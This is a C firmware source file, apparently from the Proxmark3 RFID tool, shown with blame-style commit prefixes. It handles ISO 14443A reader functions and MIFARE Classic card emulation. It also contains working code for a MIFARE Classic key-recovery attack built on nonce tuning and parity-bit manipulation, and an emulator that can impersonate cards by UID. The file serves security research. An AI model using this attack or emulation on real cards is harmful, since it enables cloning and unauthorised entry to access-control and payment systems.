ed258538 1654 AppendCrc14443a(sel_uid,7);
1655 ReaderTransmit(sel_uid,sizeof(sel_uid));
534983d7 1656
ed258538 1657 // Receive the SAK
1658 if (!ReaderReceive(resp)) return 0;
1659 sak = resp[0];
79a73ab2 1660
1661 // Test if more parts of the uid are comming
1662 if ((sak & 0x04) && uid_resp[0] == 0x88) {
1663 // Remove first byte, 0x88 is not an UID byte, it CT, see page 3 of:
1664 // http://www.nxp.com/documents/application_note/AN10927.pdf
ed258538 1665 memcpy(uid_resp, uid_resp + 1, 3);
79a73ab2 1666 uid_resp_len = 3;
1667 }
1668
1669 if(uid_ptr) {
1670 memcpy(uid_ptr + (cascade_level*3), uid_resp, uid_resp_len);
1671 }
1672
1673 if(p_hi14a_card) {
1674 memcpy(p_hi14a_card->uid + (cascade_level*3), uid_resp, uid_resp_len);
1675 p_hi14a_card->uidlen += uid_resp_len;
1676 }
ed258538 1677 }
79a73ab2 1678
ed258538 1679 if(p_hi14a_card) {
1680 p_hi14a_card->sak = sak;
1681 p_hi14a_card->ats_len = 0;
1682 }
534983d7 1683
ed258538 1684 if( (sak & 0x20) == 0) {
1685 return 2; // non iso14443a compliant tag
79a73ab2 1686 }
534983d7 1687
ed258538 1688 // Request for answer to select
5191b3d1 1689 AppendCrc14443a(rats, 2);
1690 ReaderTransmit(rats, sizeof(rats));
1691
1692 if (!(len = ReaderReceive(resp))) return 0;
1693
1694 if(p_hi14a_card) {
ed258538 1695 memcpy(p_hi14a_card->ats, resp, sizeof(p_hi14a_card->ats));
1696 p_hi14a_card->ats_len = len;
1697 }
20f9a2a1 1698
ed258538 1699 // reset the PCB block number
1700 iso14_pcb_blocknum = 0;
1701 return 1;
7e758047 1702}
15c4dc5a 1703
7e758047 1704void iso14443a_setup() {
902cb3c0 1705 // Set up the synchronous serial port
1706 FpgaSetupSsc();
7e758047 1707 // Start from off (no field generated)
1708 // Signal field is off with the appropriate LED
1709 LED_D_OFF();
1710 FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF);
902cb3c0 1711 SpinDelay(50);
15c4dc5a 1712
7e758047 1713 SetAdcMuxFor(GPIO_MUXSEL_HIPKD);
e30c654b 1714
7e758047 1715 // Now give it time to spin up.
1716 // Signal field is on with the appropriate LED
1717 LED_D_ON();
1718 FpgaWriteConfWord(FPGA_MAJOR_MODE_HF_ISO14443A | FPGA_HF_ISO14443A_READER_MOD);
902cb3c0 1719 SpinDelay(50);
534983d7 1720
1721 iso14a_timeout = 2048; //default
7e758047 1722}
15c4dc5a 1723
534983d7 1724int iso14_apdu(uint8_t * cmd, size_t cmd_len, void * data) {
1725 uint8_t real_cmd[cmd_len+4];
1726 real_cmd[0] = 0x0a; //I-Block
b0127e65 1727 // put block number into the PCB
1728 real_cmd[0] |= iso14_pcb_blocknum;
534983d7 1729 real_cmd[1] = 0x00; //CID: 0 //FIXME: allow multiple selected cards
1730 memcpy(real_cmd+2, cmd, cmd_len);
1731 AppendCrc14443a(real_cmd,cmd_len+2);
1732
1733 ReaderTransmit(real_cmd, cmd_len+4);
1734 size_t len = ReaderReceive(data);
b0127e65 1735 uint8_t * data_bytes = (uint8_t *) data;
1736 if (!len)
1737 return 0; //DATA LINK ERROR
1738 // if we received an I- or R(ACK)-Block with a block number equal to the
1739 // current block number, toggle the current block number
1740 else if (len >= 4 // PCB+CID+CRC = 4 bytes
1741 && ((data_bytes[0] & 0xC0) == 0 // I-Block
1742 || (data_bytes[0] & 0xD0) == 0x80) // R-Block with ACK bit set to 0
1743 && (data_bytes[0] & 0x01) == iso14_pcb_blocknum) // equal block numbers
1744 {
1745 iso14_pcb_blocknum ^= 1;
1746 }
1747
534983d7 1748 return len;
1749}
1750
7e758047 1751//-----------------------------------------------------------------------------
1752// Read an ISO 14443a tag. Send out commands and store answers.
1753//
1754//-----------------------------------------------------------------------------
902cb3c0 1755void ReaderIso14443a(UsbCommand * c)
7e758047 1756{
534983d7 1757 iso14a_command_t param = c->arg[0];
1758 uint8_t * cmd = c->d.asBytes;
1759 size_t len = c->arg[1];
79a73ab2 1760 uint32_t arg0 = 0;
1761 byte_t buf[USB_CMD_DATA_SIZE];
902cb3c0 1762
1763 iso14a_clear_trace();
1764 iso14a_set_tracing(true);
e30c654b 1765
79a73ab2 1766 if(param & ISO14A_REQUEST_TRIGGER) {
1767 iso14a_set_trigger(1);
1768 }
15c4dc5a 1769
534983d7 1770 if(param & ISO14A_CONNECT) {
1771 iso14443a_setup();
79a73ab2 1772 arg0 = iso14443a_select_card(NULL,(iso14a_card_select_t*)buf,NULL);
1773 cmd_send(CMD_ACK,arg0,0,0,buf,sizeof(iso14a_card_select_t));
902cb3c0 1774// UsbSendPacket((void *)ack, sizeof(UsbCommand));
534983d7 1775 }
e30c654b 1776
534983d7 1777 if(param & ISO14A_SET_TIMEOUT) {
1778 iso14a_timeout = c->arg[2];
1779 }
e30c654b 1780
534983d7 1781 if(param & ISO14A_SET_TIMEOUT) {
1782 iso14a_timeout = c->arg[2];
1783 }
e30c654b 1784
534983d7 1785 if(param & ISO14A_APDU) {
902cb3c0 1786 arg0 = iso14_apdu(cmd, len, buf);
79a73ab2 1787 cmd_send(CMD_ACK,arg0,0,0,buf,sizeof(buf));
902cb3c0 1788// UsbSendPacket((void *)ack, sizeof(UsbCommand));
534983d7 1789 }
e30c654b 1790
534983d7 1791 if(param & ISO14A_RAW) {
1792 if(param & ISO14A_APPEND_CRC) {
1793 AppendCrc14443a(cmd,len);
1794 len += 2;
15c4dc5a 1795 }
534983d7 1796 ReaderTransmit(cmd,len);
902cb3c0 1797 arg0 = ReaderReceive(buf);
1798// UsbSendPacket((void *)ack, sizeof(UsbCommand));
79a73ab2 1799 cmd_send(CMD_ACK,arg0,0,0,buf,sizeof(buf));
534983d7 1800 }
15c4dc5a 1801
79a73ab2 1802 if(param & ISO14A_REQUEST_TRIGGER) {
1803 iso14a_set_trigger(0);
1804 }
15c4dc5a 1805
79a73ab2 1806 if(param & ISO14A_NO_DISCONNECT) {
534983d7 1807 return;
79a73ab2 1808 }
15c4dc5a 1809
15c4dc5a 1810 FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF);
1811 LEDsoff();
15c4dc5a 1812}
b0127e65 1813
401afb61 1814#define TEST_LENGTH 100
1815typedef struct mftest{
1816 uint8_t nt[8];
1817 uint8_t count;
1818}mftest ;
1819
1820/**
1821 *@brief Tunes the mifare attack settings. This method checks the nonce entropy when
1822 *using a specified timeout.
1823 *Different cards behave differently, some cards require up to a second to power down (and thus reset
1824 *token generator), other cards are fine with 50 ms.
1825 *
1826 * @param time
1827 * @return the entropy. A value of 100 (%) means that every nonce was unique, while a value close to
1828 *zero indicates a low entropy: the given timeout is sufficient to power down the card.
1829 */
1830int TuneMifare(int time)
1831{
1832 // Mifare AUTH
1833 uint8_t mf_auth[] = { 0x60,0x00,0xf5,0x7b };
3b33bda6 1834 uint8_t* receivedAnswer = (((uint8_t *)BigBuf) + FREE_BUFFER_OFFSET);
401afb61 1835
1836 iso14443a_setup();
1837 int TIME1=time;
1838 int TIME2=2000;
1839 uint8_t uid[8];
1840 uint32_t cuid;
1841 byte_t nt[4];
3b33bda6 1842 Dbprintf("Tuning... testing a delay of %d ms (press button to skip)",time);
401afb61 1843
1844
1845 mftest nt_values[TEST_LENGTH];
1846 int nt_size = 0;
1847 int i = 0;
1848 for(i = 0 ; i< 100 ; i++)
1849 {
1850 LED_C_OFF();
1851 FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF);
1852 SpinDelay(TIME1);
1853 FpgaWriteConfWord(FPGA_MAJOR_MODE_HF_ISO14443A | FPGA_HF_ISO14443A_READER_MOD);
1854 LED_C_ON();
1855 SpinDelayUs(TIME2);
1856 if(!iso14443a_select_card(uid, NULL, &cuid)) continue;
1857
1858 // Transmit MIFARE_CLASSIC_AUTH
1859 ReaderTransmit(mf_auth, sizeof(mf_auth));
1860
1861 // Receive the (16 bit) "random" nonce
1862 if (!ReaderReceive(receivedAnswer)) continue;
1863 memcpy(nt, receivedAnswer, 4);
1864
1865 //store it
1866 int already_stored = 0;
1867 for(int i = 0 ; i < nt_size && !already_stored; i++)
1868 {
1869 if( memcmp(nt, nt_values[i].nt, 4) == 0)
1870 {
1871 nt_values[i].count++;
1872 already_stored = 1;
1873 }
1874 }
1875 if(!already_stored)
1876 {
1877 mftest* ptr= &nt_values[nt_size++];
1878 //Clear it before use
1879 memset(ptr, 0, sizeof(mftest));
1880 memcpy(ptr->nt, nt, 4);
1881 ptr->count = 1;
1882 }
1883
1884 if(BUTTON_PRESS())
1885 {
1886 Dbprintf("Tuning aborted prematurely");
1887 break;
1888 }
1889 }
1890 /*
1891 for(int i = 0 ; i < nt_size;i++){
1892 mftest x = nt_values[i];
1893 Dbprintf("%d,%d,%d,%d : %d",x.nt[0],x.nt[1],x.nt[2],x.nt[3],x.count);
1894 }
1895 */
1896 int result = nt_size *100 / i;
1897 Dbprintf(" ... results for %d ms : %d %",time, result);
1898 return result;
1899}
1900
15c4dc5a 1901//-----------------------------------------------------------------------------
1902// Read an ISO 14443a tag. Send out commands and store answers.
1903//
1904//-----------------------------------------------------------------------------
401afb61 1905#define STATE_SIZE 100
1906typedef struct AttackState{
1907 byte_t nt[4];
401afb61 1908 byte_t par_list[8];
1909 byte_t ks_list[8];
1910 byte_t par;
1911 byte_t par_low;
1912 byte_t nt_diff;
1913 uint8_t mf_nr_ar[8];
1914} AttackState;
1915
1916
1917int continueAttack(AttackState* pState,uint8_t* receivedAnswer)
1918{
1919
1920 // Transmit reader nonce and reader answer
1921 ReaderTransmitPar(pState->mf_nr_ar, sizeof(pState->mf_nr_ar),pState->par);
1922
1923 // Receive 4 bit answer
1924 int len = ReaderReceive(receivedAnswer);
1925 if (!len)
1926 {
1927 if (pState->nt_diff == 0)
1928 {
1929 pState->par++;
1930 } else {
1931 pState->par = (((pState->par >> 3) + 1) << 3) | pState->par_low;
1932 }
1933 return 2;
1934 }
1935 if(pState->nt_diff == 0)
1936 {
1937 pState->par_low = pState->par & 0x07;
1938 }
1939 //Dbprintf("answer received, parameter (%d), (memcmp(nt, nt_no)=%d",parameter,memcmp(nt, nt_noattack, 4));
1940 //if ( (parameter != 0) && (memcmp(nt, nt_noattack, 4) == 0) ) continue;
1941 //isNULL = 0;//|| !(nt_attacked[0] == 0) && (nt_attacked[1] == 0) && (nt_attacked[2] == 0) && (nt_attacked[3] == 0);
1942 //
1943 // if ( /*(isNULL != 0 ) && */(memcmp(nt, nt_attacked, 4) != 0) ) continue;
1944
1945 //led_on = !led_on;
1946 //if(led_on) LED_B_ON(); else LED_B_OFF();
1947 pState->par_list[pState->nt_diff] = pState->par;
1948 pState->ks_list[pState->nt_diff] = receivedAnswer[0] ^ 0x05;
1949
1950 // Test if the information is complete
1951 if (pState->nt_diff == 0x07) {
1952 return 0;
1953 }
1954
1955 pState->nt_diff = (pState->nt_diff + 1) & 0x07;
1956 pState->mf_nr_ar[3] = pState->nt_diff << 5;
1957 pState->par = pState->par_low;
1958 return 1;
1959}
1960
1961void reportResults(uint8_t uid[8],AttackState *pState, int isOK)
1962{
1963 LogTrace(pState->nt, 4, 0, GetParity(pState->nt, 4), TRUE);
1964 LogTrace(pState->par_list, 8, 0, GetParity(pState->par_list, 8), TRUE);
1965 LogTrace(pState->ks_list, 8, 0, GetParity(pState->ks_list, 8), TRUE);
1966
1967 byte_t buf[48];
1968 memcpy(buf + 0, uid, 4);
1969 if(pState != NULL)
1970 {
1971 memcpy(buf + 4, pState->nt, 4);
1972 memcpy(buf + 8, pState->par_list, 8);
1973 memcpy(buf + 16, pState->ks_list, 8);
1974 }
1975
1976 LED_B_ON();
1977 cmd_send(CMD_ACK,isOK,0,0,buf,48);
1978 LED_B_OFF();
1979
1980 // Thats it...
1981 FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF);
1982 LEDsoff();
1983 tracing = TRUE;
1984
1985 if (MF_DBGLEVEL >= 1) DbpString("COMMAND mifare FINISHED");
1986}
1987
3b33bda6 1988void ReaderMifareBegin(uint32_t offset_time, uint32_t powerdown_time);
401afb61 1989
3b33bda6 1990/**
1991 * @brief New implementation of ReaderMifare, the classic mifare attack.
1992 * This implementation is backwards-compatible, but has some added parameters.
1993 * @param c the usbcommand in complete
1994 * c->arg[0] - nt_noattack (deprecated)
1995 * c->arg[1] - offset_time us (0 => random)
1996 * c->arg[2] - powerdown_time ms (0=> tuning)
1997 *
1998 */
1999void ReaderMifare(UsbCommand *c)
15c4dc5a 2000{
3b33bda6 2001 /*
2002 * The 'no-attack' is not used anymore, with the introduction of
2003 * state tables. Instead, we use an offset which is random. This means that we
2004 * should not get stuck on a 'bad' nonce, so no-attack is not needed.
2005 * Anyway, arg[0] is reserved for backwards compatibility
2006 uint32_t nt_noattack_uint = c->arg[0];
2007 byte_t nt_noattack[4];
2008 num_to_bytes(parameter, 4, nt_noattack_uint);
401afb61 2009
3b33bda6 2010 */
2011 /*
2012 *IF, for some reason, you want to attack a specific nonce or whatever,
2013 *you can specify the offset time yourself, in which case it won't be random.
2014 *
2015 * The offset time is microseconds, MICROSECONDS, not ms.
2016 */
2017 uint32_t offset_time = c->arg[1];
2018 if(offset_time == 0)
2019 {
2020 //[Martin:]I would like to have used rand(), but linking problems prevented it
2021 //offset_time = rand() % 4000;
2022 //So instead, I found this nifty thingy, which seems to fit the bill
2023 offset_time = GetTickCount() % 2000;
401afb61 2024 }
3b33bda6 2025 /*
2026 * There is an implementation of tuning. Tuning will try to determine
2027 * a good power-down time, which is different for different cards.
2028 * If a value is specified from the packet, we won't do any tuning.
2029 * A value of zero will initialize a tuning.
2030 * The power-down time is milliseconds, that MILLI-seconds .
2031 */
2032 uint32_t powerdown_time = c->arg[2];
2033 if(powerdown_time == 0)
2034 {
2035 //Tuning required
2036 int entropy = 100;
2037 int time = 25;
2038 entropy = TuneMifare(time);
401afb61 2039
3b33bda6 2040 while(entropy > 50 && time < 2000){
2041 //Increase timeout, but never more than 500ms at a time
2042 time = MIN(time*2, time+500);
2043 entropy = TuneMifare(time);
2044 }
2045 if(entropy > 50){
2046 Dbprintf("OBS! This card has high entropy (%d) and slow power-down. This may take a while", entropy);
2047 }
2048 powerdown_time = time;
401afb61 2049 }
3b33bda6 2050 //The actual attack
2051 ReaderMifareBegin(offset_time, powerdown_time);
2052}
2053void ReaderMifareBegin(uint32_t offset_time, uint32_t powerdown_time)
2054{
2055 Dbprintf("Using power-down-time of %d ms, offset time %d us", powerdown_time, offset_time);
401afb61 2056
2057 /**
2058 *Allocate our state-table and initialize with zeroes
2059 **/
2060
401afb61 2061 AttackState states[STATE_SIZE] ;
3b33bda6 2062 //Dbprintf("Memory allocated ok! (%d bytes)",STATE_SIZE*sizeof(AttackState) );
401afb61 2063 memset(states, 0, STATE_SIZE*sizeof(AttackState));
3b33bda6 2064
2065 // Mifare AUTH
f7e3ed82 2066 uint8_t mf_auth[] = { 0x60,0x00,0xf5,0x7b };
902cb3c0 2067 uint8_t* receivedAnswer = (((uint8_t *)BigBuf) + FREE_BUFFER_OFFSET); // was 3560 - tied to other size changes
401afb61 2068
2069 traceLen = 0;
f89c7050 2070 tracing = false;
e30c654b 2071
7e758047 2072 iso14443a_setup();
15c4dc5a 2073 LED_A_ON();
2074 LED_B_OFF();
2075 LED_C_OFF();
e30c654b 2076
f89c7050 2077 LED_A_OFF();
50193c1e 2078 uint8_t uid[8];
f89c7050 2079 uint32_t cuid;
e30c654b 2080
401afb61 2081 byte_t nt[4];
2082 int nts_attacked= 0;
2083 //Keeps track of progress (max value of nt_diff for our states)
2084 int progress = 0;
2085 int high_entropy_warning_issued = 0;
2086 while(!BUTTON_PRESS())
f89c7050 2087 {
bfaecce6 2088 LED_C_OFF();
f89c7050 2089 FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF);
3b33bda6 2090 SpinDelay(powerdown_time);
f89c7050 2091 FpgaWriteConfWord(FPGA_MAJOR_MODE_HF_ISO14443A | FPGA_HF_ISO14443A_READER_MOD);
bfaecce6 2092 LED_C_ON();
3b33bda6 2093 SpinDelayUs(offset_time);
e30c654b 2094
f89c7050 2095 if(!iso14443a_select_card(uid, NULL, &cuid)) continue;
e30c654b 2096
f89c7050
M
2097 // Transmit MIFARE_CLASSIC_AUTH
2098 ReaderTransmit(mf_auth, sizeof(mf_auth));
15c4dc5a 2099
f89c7050
M
2100 // Receive the (16 bit) "random" nonce
2101 if (!ReaderReceive(receivedAnswer)) continue;
401afb61 2102 memcpy(nt, receivedAnswer, 4);
2103
2104 //Now we have the NT. Check if this NT is already under attack
2105 AttackState* pState = NULL;
2106 int i = 0;
2107 for(i = 0 ; i < nts_attacked && pState == NULL; i++)
2108 {
2109 if( memcmp(nt, states[i].nt, 4) == 0)
2110 {
2111 //we have it
2112 pState = &states[i];
2113 //Dbprintf("Existing state found (%d)", i);
2114 }
2115 }
e30c654b 2116
401afb61 2117 if(pState == NULL){
2118 if(nts_attacked < STATE_SIZE )
2119 {
2120 //Initialize a new state
2121 pState = &states[nts_attacked++];
2122 //Clear it before use
2123 memset(pState, 0, sizeof(AttackState));
2124 memcpy(pState->nt, nt, 4);
2125 i = nts_attacked;
2126 //Dbprintf("New state created, nt=");
2127 }else if(!high_entropy_warning_issued){
2128 /**
2129 *If we wound up here, it means that the state table was eaten up by potential nonces. This could be fixed by
2130 *increasing the size of the state buffer, however, it points to some other problem. Ideally, we should get the same nonce
2131 *every time. Realistically we should get a few different nonces, but if we get more than 50, there is probably somehting
2132 *else that is wrong. An attack using too high nonce entropy will take **LONG** time to finish.
2133 */
2134 DbpString("WARNING: Nonce entropy is suspiciously high, something is wrong. Check timeouts (and perhaps increase STATE_SIZE)");
2135 high_entropy_warning_issued = 1;
2136 }
2137 }
401afb61 2138 if(pState == NULL) continue;
15c4dc5a 2139
401afb61 2140 int result = continueAttack(pState, receivedAnswer);
e30c654b 2141
401afb61 2142 if(result == 1){
2143 //One state progressed another step
2144 if(pState->nt_diff > progress)
2145 {
2146 progress = pState->nt_diff;
2147 //Alert the user
2148 Dbprintf("Recovery progress: %d/8, NTs attacked: %d ", progress,nts_attacked );
2149 }
2150 //Dbprintf("State increased to %d in state %d", pState->nt_diff, i);
2151 }
2152 else if(result == 2){
2153 //Dbprintf("Continue attack no answer, par is now %d", pState->par);
2154 }
2155 else if(result == 0){
401afb61 2156 reportResults(uid,pState,1);
2157 return;
401afb61 2158 }
2159 }
2160 reportResults(uid,NULL,0);
20f9a2a1 2161}
20f9a2a1
M
2162//-----------------------------------------------------------------------------
2163// MIFARE 1K simulate.
2164//
2165//-----------------------------------------------------------------------------
2166void Mifare1ksim(uint8_t arg0, uint8_t arg1, uint8_t arg2, uint8_t *datain)
2167{
50193c1e 2168 int cardSTATE = MFEMUL_NOFIELD;
8556b852 2169 int _7BUID = 0;
9ca155ba 2170 int vHf = 0; // in mV
9f693930 2171 //int nextCycleTimeout = 0;
8f51ddb0 2172 int res;
51969283 2173// uint32_t timer = 0;
0a39986e
M
2174 uint32_t selTimer = 0;
2175 uint32_t authTimer = 0;
2176 uint32_t par = 0;
9ca155ba 2177 int len = 0;
8f51ddb0 2178 uint8_t cardWRBL = 0;
9ca155ba
M
2179 uint8_t cardAUTHSC = 0;
2180 uint8_t cardAUTHKEY = 0xff; // no authentication
9f693930 2181 //uint32_t cardRn = 0;
51969283 2182 uint32_t cardRr = 0;
9ca155ba 2183 uint32_t cuid = 0;
9f693930 2184 //uint32_t rn_enc = 0;
51969283 2185 uint32_t ans = 0;
0014cb46
M
2186 uint32_t cardINTREG = 0;
2187 uint8_t cardINTBLOCK = 0;
9ca155ba
M
2188 struct Crypto1State mpcs = {0, 0};
2189 struct Crypto1State *pcs;
2190 pcs = &mpcs;
2191
8f51ddb0
M
2192 uint8_t* receivedCmd = eml_get_bigbufptr_recbuf();
2193 uint8_t *response = eml_get_bigbufptr_sendbuf();
9ca155ba 2194
8556b852 2195 static uint8_t rATQA[] = {0x04, 0x00}; // Mifare classic 1k 4BUID
9ca155ba 2196
0a39986e
M
2197 static uint8_t rUIDBCC1[] = {0xde, 0xad, 0xbe, 0xaf, 0x62};
2198 static uint8_t rUIDBCC2[] = {0xde, 0xad, 0xbe, 0xaf, 0x62}; // !!!
9ca155ba 2199
0a39986e 2200 static uint8_t rSAK[] = {0x08, 0xb6, 0xdd};
8556b852 2201 static uint8_t rSAK1[] = {0x04, 0xda, 0x17};
9ca155ba 2202
0014cb46
M
2203 static uint8_t rAUTH_NT[] = {0x01, 0x02, 0x03, 0x04};
2204// static uint8_t rAUTH_NT[] = {0x1a, 0xac, 0xff, 0x4f};
0a39986e 2205 static uint8_t rAUTH_AT[] = {0x00, 0x00, 0x00, 0x00};
0014cb46 2206
0a39986e
M
2207 // clear trace
2208 traceLen = 0;
2209 tracing = true;
51969283
M
2210
2211 // Authenticate response - nonce
2212 uint32_t nonce = bytes_to_num(rAUTH_NT, 4);
9ca155ba 2213
8556b852
M
2214 // get UID from emul memory
2215 emlGetMemBt(receivedCmd, 7, 1);
2216 _7BUID = !(receivedCmd[0] == 0x00);
2217 if (!_7BUID) { // ---------- 4BUID
2218 rATQA[0] = 0x04;
2219
2220 emlGetMemBt(rUIDBCC1, 0, 4);
2221 rUIDBCC1[4] = rUIDBCC1[0] ^ rUIDBCC1[1] ^ rUIDBCC1[2] ^ rUIDBCC1[3];
2222 } else { // ---------- 7BUID
2223 rATQA[0] = 0x44;
2224
2225 rUIDBCC1[0] = 0x88;
2226 emlGetMemBt(&rUIDBCC1[1], 0, 3);
2227 rUIDBCC1[4] = rUIDBCC1[0] ^ rUIDBCC1[1] ^ rUIDBCC1[2] ^ rUIDBCC1[3];
2228 emlGetMemBt(rUIDBCC2, 3, 4);
2229 rUIDBCC2[4] = rUIDBCC2[0] ^ rUIDBCC2[1] ^ rUIDBCC2[2] ^ rUIDBCC2[3];
2230 }
2231
9ca155ba 2232// -------------------------------------- test area
50193c1e 2233
9ca155ba 2234// -------------------------------------- END test area
8f51ddb0
M
2235 // start mkseconds counter
2236 StartCountUS();
9ca155ba
M
2237
2238 // We need to listen to the high-frequency, peak-detected path.
2239 SetAdcMuxFor(GPIO_MUXSEL_HIPKD);
2240 FpgaSetupSsc();
2241
2242 FpgaWriteConfWord(FPGA_MAJOR_MODE_HF_ISO14443A | FPGA_HF_ISO14443A_TAGSIM_LISTEN);
2243 SpinDelay(200);
2244
0014cb46 2245 if (MF_DBGLEVEL >= 1) Dbprintf("Started. 7buid=%d", _7BUID);
8f51ddb0
M
2246 // calibrate mkseconds counter
2247 GetDeltaCountUS();
9ca155ba
M
2248 while (true) {
2249 WDT_HIT();
9ca155ba 2250
8f51ddb0
M
2251 if(BUTTON_PRESS()) {
2252 break;
2253 }
2254
9ca155ba
M
2255 // find reader field
2256 // Vref = 3300mV, and an 10:1 voltage divider on the input
2257 // can measure voltages up to 33000 mV
2258 if (cardSTATE == MFEMUL_NOFIELD) {
2259 vHf = (33000 * AvgAdc(ADC_CHAN_HF)) >> 10;
2260 if (vHf > MF_MINFIELDV) {
0014cb46 2261 cardSTATE_TO_IDLE();
9ca155ba
M
2262 LED_A_ON();
2263 }
2264 }
2265
2266 if (cardSTATE != MFEMUL_NOFIELD) {
81cd0474 2267 res = EmGetCmd(receivedCmd, &len, RECV_CMD_SIZE); // (+ nextCycleTimeout)
9ca155ba
M
2268 if (res == 2) {
2269 cardSTATE = MFEMUL_NOFIELD;
2270 LEDsoff();
2271 continue;
2272 }
2273 if(res) break;
2274 }
2275
9f693930 2276 //nextCycleTimeout = 0;
8f51ddb0 2277
9ca155ba 2278// if (len) Dbprintf("len:%d cmd: %02x %02x %02x %02x", len, receivedCmd[0], receivedCmd[1], receivedCmd[2], receivedCmd[3]);
0a39986e
M
2279
2280 if (len != 4 && cardSTATE != MFEMUL_NOFIELD) { // len != 4 <---- speed up the code 4 authentication
8f51ddb0 2281 // REQ or WUP request in ANY state and WUP in HALTED state
0a39986e
M
2282 if (len == 1 && ((receivedCmd[0] == 0x26 && cardSTATE != MFEMUL_HALTED) || receivedCmd[0] == 0x52)) {
2283 selTimer = GetTickCount();
2284 EmSendCmdEx(rATQA, sizeof(rATQA), (receivedCmd[0] == 0x52));
2285 cardSTATE = MFEMUL_SELECT1;
2286
2287 // init crypto block
2288 LED_B_OFF();
2289 LED_C_OFF();
2290 crypto1_destroy(pcs);
2291 cardAUTHKEY = 0xff;
2292 }
2293 }
9ca155ba 2294
50193c1e
M
2295 switch (cardSTATE) {
2296 case MFEMUL_NOFIELD:{
2297 break;
2298 }
9ca155ba 2299 case MFEMUL_HALTED:{
0a39986e 2300 break;
9ca155ba 2301 }
50193c1e
M
2302 case MFEMUL_IDLE:{
2303 break;
2304 }
2305 case MFEMUL_SELECT1:{
9ca155ba
M
2306 // select all
2307 if (len == 2 && (receivedCmd[0] == 0x93 && receivedCmd[1] == 0x20)) {
2308 EmSendCmd(rUIDBCC1, sizeof(rUIDBCC1));
0014cb46 2309 break;
9ca155ba
M
2310 }
2311
2312 // select card
0a39986e
M
2313 if (len == 9 &&
2314 (receivedCmd[0] == 0x93 && receivedCmd[1] == 0x70 && memcmp(&receivedCmd[2], rUIDBCC1, 4) == 0)) {
8556b852
M
2315 if (!_7BUID)
2316 EmSendCmd(rSAK, sizeof(rSAK));
2317 else
2318 EmSendCmd(rSAK1, sizeof(rSAK1));
9ca155ba
M
2319
2320 cuid = bytes_to_num(rUIDBCC1, 4);
8556b852
M
2321 if (!_7BUID) {
2322 cardSTATE = MFEMUL_WORK;
0014cb46
M
2323 LED_B_ON();
2324 if (MF_DBGLEVEL >= 4) Dbprintf("--> WORK. anticol1 time: %d", GetTickCount() - selTimer);
2325 break;
8556b852
M
2326 } else {
2327 cardSTATE = MFEMUL_SELECT2;
2328 break;
2329 }
9ca155ba
M
2330 }
2331
50193c1e
M
2332 break;
2333 }
2334 case MFEMUL_SELECT2:{
0014cb46
M
2335 if (!len) break;
2336
8556b852 2337 if (len == 2 && (receivedCmd[0] == 0x95 && receivedCmd[1] == 0x20)) {
9ca155ba 2338 EmSendCmd(rUIDBCC2, sizeof(rUIDBCC2));
8556b852
M
2339 break;
2340 }
9ca155ba 2341
8556b852
M
2342 // select 2 card
2343 if (len == 9 &&
2344 (receivedCmd[0] == 0x95 && receivedCmd[1] == 0x70 && memcmp(&receivedCmd[2], rUIDBCC2, 4) == 0)) {
2345 EmSendCmd(rSAK, sizeof(rSAK));
2346
2347 cuid = bytes_to_num(rUIDBCC2, 4);
2348 cardSTATE = MFEMUL_WORK;
2349 LED_B_ON();
0014cb46 2350 if (MF_DBGLEVEL >= 4) Dbprintf("--> WORK. anticol2 time: %d", GetTickCount() - selTimer);
8556b852
M
2351 break;
2352 }
0014cb46
M
2353
2354 // i guess there is a command). go into the work state.
2355 if (len != 4) break;
2356 cardSTATE = MFEMUL_WORK;
2357 goto lbWORK;
50193c1e
M
2358 }
2359 case MFEMUL_AUTH1:{
9ca155ba 2360 if (len == 8) {
51969283 2361 // --- crypto
9f693930
GY
2362 //rn_enc = bytes_to_num(receivedCmd, 4);
2363 //cardRn = rn_enc ^ crypto1_word(pcs, rn_enc , 1);
51969283
M
2364 cardRr = bytes_to_num(&receivedCmd[4], 4) ^ crypto1_word(pcs, 0, 0);
2365 // test if auth OK
2366 if (cardRr != prng_successor(nonce, 64)){
0014cb46
M
2367 if (MF_DBGLEVEL >= 4) Dbprintf("AUTH FAILED. cardRr=%08x, succ=%08x", cardRr, prng_successor(nonce, 64));
2368 cardSTATE_TO_IDLE();
51969283
M
2369 break;
2370 }
2371 ans = prng_successor(nonce, 96) ^ crypto1_word(pcs, 0, 0);
2372 num_to_bytes(ans, 4, rAUTH_AT);
2373 // --- crypto
2374 EmSendCmd(rAUTH_AT, sizeof(rAUTH_AT));
0a39986e
M
2375 cardSTATE = MFEMUL_AUTH2;
2376 } else {
0014cb46 2377 cardSTATE_TO_IDLE();
9ca155ba 2378 }
0a39986e 2379 if (cardSTATE != MFEMUL_AUTH2) break;
50193c1e
M
2380 }
2381 case MFEMUL_AUTH2:{
9ca155ba 2382 LED_C_ON();
0a39986e 2383 cardSTATE = MFEMUL_WORK;
0014cb46 2384 if (MF_DBGLEVEL >= 4) Dbprintf("AUTH COMPLETED. sec=%d, key=%d time=%d", cardAUTHSC, cardAUTHKEY, GetTickCount() - authTimer);
50193c1e
M
2385 break;
2386 }
9ca155ba 2387 case MFEMUL_WORK:{
0014cb46 2388lbWORK: if (len == 0) break;
0a39986e 2389
51969283
M
2390 if (cardAUTHKEY == 0xff) {
2391 // first authentication
2392 if (len == 4 && (receivedCmd[0] == 0x60 || receivedCmd[0] == 0x61)) {
2393 authTimer = GetTickCount();
2394
2395 cardAUTHSC = receivedCmd[1] / 4; // received block num
2396 cardAUTHKEY = receivedCmd[0] - 0x60;
2397
2398 // --- crypto
2399 crypto1_create(pcs, emlGetKey(cardAUTHSC, cardAUTHKEY));
2400 ans = nonce ^ crypto1_word(pcs, cuid ^ nonce, 0);
2401 num_to_bytes(nonce, 4, rAUTH_AT);
2402 EmSendCmd(rAUTH_AT, sizeof(rAUTH_AT));
2403 // --- crypto
2404
2405// last working revision
2406// EmSendCmd14443aRaw(resp1, resp1Len, 0);
2407// LogTrace(NULL, 0, GetDeltaCountUS(), 0, true);
2408
2409 cardSTATE = MFEMUL_AUTH1;
9f693930 2410 //nextCycleTimeout = 10;
51969283
M
2411 break;
2412 }
2413 } else {
2414 // decrypt seqence
2415 mf_crypto1_decrypt(pcs, receivedCmd, len);
2416
2417 // nested authentication
2418 if (len == 4 && (receivedCmd[0] == 0x60 || receivedCmd[0] == 0x61)) {
2419 authTimer = GetTickCount();
2420
